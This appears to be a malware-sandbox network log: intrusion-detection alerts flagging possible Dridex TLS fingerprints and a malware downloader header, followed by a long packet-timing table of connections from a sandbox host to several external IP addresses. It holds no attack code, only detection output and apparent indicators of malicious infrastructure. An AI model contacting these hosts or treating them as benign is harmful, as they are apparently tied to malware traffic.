2024-10-03T03:26:50.433191+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57952 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:51.659845+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57953 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:54.683434+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57954 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:55.767673+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57955 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:57.026967+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57956 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:58.473481+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57957 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:00.540687+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57958 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:02.447080+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57959 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:04.221912+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57960 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:05.898986+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57961 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:07.438246+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57962 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:10.650406+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57963 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:12.316186+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57964 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:13.692925+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57965 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:15.636741+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57966 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:17.744774+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57968 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:20.454725+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57969 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:22.257645+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 57970 | 147.45.44.104 | 80 | TCP
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 3, 2024 03:26:42.562767029 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.562791109 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.562946081 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.562946081 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.562980890 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.564546108 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.568511009 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.568577051 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.568593979 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.568618059 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.568666935 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.568979025 CEST57946443192.168.2.7104.102.49.254
                                                                                                                          Oct 3, 2024 03:26:42.569025040 CEST44357946104.102.49.254192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.630548954 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:42.630598068 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:42.630892038 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:42.631015062 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:42.631031990 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.493030071 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.493412971 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.499249935 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.499262094 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.499506950 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.499667883 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.500063896 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.547403097 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.984858990 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.984945059 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.984992981 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.985029936 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.988301039 CEST57947443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.988317966 CEST4435794749.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:43.999888897 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:43.999932051 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:44.000004053 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.000200033 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.000212908 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:44.657723904 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:44.657799959 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.658468008 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.658474922 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:44.660161972 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:44.660166979 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360076904 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360137939 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360152960 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360204935 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360245943 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360284090 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360318899 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.360358000 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360377073 CEST57948443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.360389948 CEST4435794849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.375839949 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.375966072 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:45.376055002 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.376321077 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:45.376363039 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.021198034 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.021316051 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.021871090 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.021902084 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.024055958 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.024070024 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.730447054 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.730468988 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.730544090 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.730808973 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.731297970 CEST57949443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.731373072 CEST4435794949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.747987986 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.748119116 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:46.748225927 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.748564005 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:46.748651981 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:47.472363949 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:47.472469091 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:47.472984076 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:47.473012924 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:47.474725962 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:47.474741936 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.172523022 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.172549963 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.172620058 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.172636032 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.172688961 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.172735929 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.177201986 CEST57950443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.177248955 CEST4435795049.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.192889929 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.192929029 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.192996979 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.193175077 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.193192005 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.838320017 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:48.838449955 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.986489058 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:48.986502886 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.015660048 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.015671015 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.660872936 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.660944939 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.660960913 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.661001921 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.661216021 CEST57951443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.661237955 CEST4435795149.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.750533104 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.750587940 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:49.750653982 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.750930071 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:49.750946045 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:50.433106899 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:50.433191061 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:50.433751106 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:50.433757067 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:50.435525894 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:50.435529947 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:50.435621023 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:50.435630083 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:50.992038012 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:50.992147923 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:50.992430925 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:50.992556095 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:50.992588043 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:51.166300058 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:51.166395903 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:51.166399956 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:51.166448116 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:51.167311907 CEST57952443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:51.167331934 CEST4435795249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:51.659634113 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:51.659845114 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:51.660777092 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:51.660795927 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:51.806792974 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:51.806817055 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.101579905 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.101608038 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.101622105 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.101731062 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.101732016 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.101814032 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.101887941 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.130666971 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.130682945 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.130773067 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.130791903 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.130873919 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.666260958 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.666277885 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.666354895 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.679557085 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.679598093 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.679657936 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.679675102 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.679702997 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.679735899 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.691956997 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.692004919 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.692047119 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.692063093 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.692090988 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.692133904 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.700923920 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.700965881 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.701000929 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.701016903 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.701044083 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.701066971 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.716259003 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.716301918 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.716347933 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.716370106 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.716394901 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.716419935 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.720269918 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.720290899 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.720357895 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.720374107 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.720432043 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.731686115 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.731703997 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.731771946 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.731792927 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.731842995 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.747809887 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.747872114 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.747922897 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.747940063 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.747972012 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.747994900 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.769129992 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.769175053 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.769205093 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.769227982 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.769257069 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.769278049 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.776523113 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.776576996 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.776612997 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.776631117 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.776662111 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.776684046 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.782939911 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.782982111 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.783015013 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.783031940 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.783066034 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.783087015 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.791351080 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.791414022 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.791426897 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.791446924 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.791481018 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.791503906 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.806781054 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.806822062 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.806852102 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.806879997 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.806900024 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.806937933 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.810951948 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.810992956 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.811019897 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.811036110 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.811054945 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.811089993 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.823220015 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.823273897 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.823445082 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.823446035 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.823518991 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.823585033 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.838521957 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.838565111 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.838707924 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.838707924 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.838779926 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.838836908 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.860014915 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.860063076 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.860384941 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.860454082 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.860564947 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.867053986 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.867101908 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.867185116 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.867185116 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.867209911 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.867259026 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.873169899 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.873212099 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.873276949 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.873352051 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.873394966 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.873420954 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.882132053 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.882174969 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.882235050 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.882309914 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.882360935 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.882360935 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.897516012 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.897558928 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.897623062 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.897699118 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.897742033 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.897767067 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.901571035 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.901614904 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.901652098 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.901673079 CEST4435795349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:52.901701927 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.901724100 CEST57953443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:26:52.913871050 CEST4435795349.12.197.9192.168.2.7
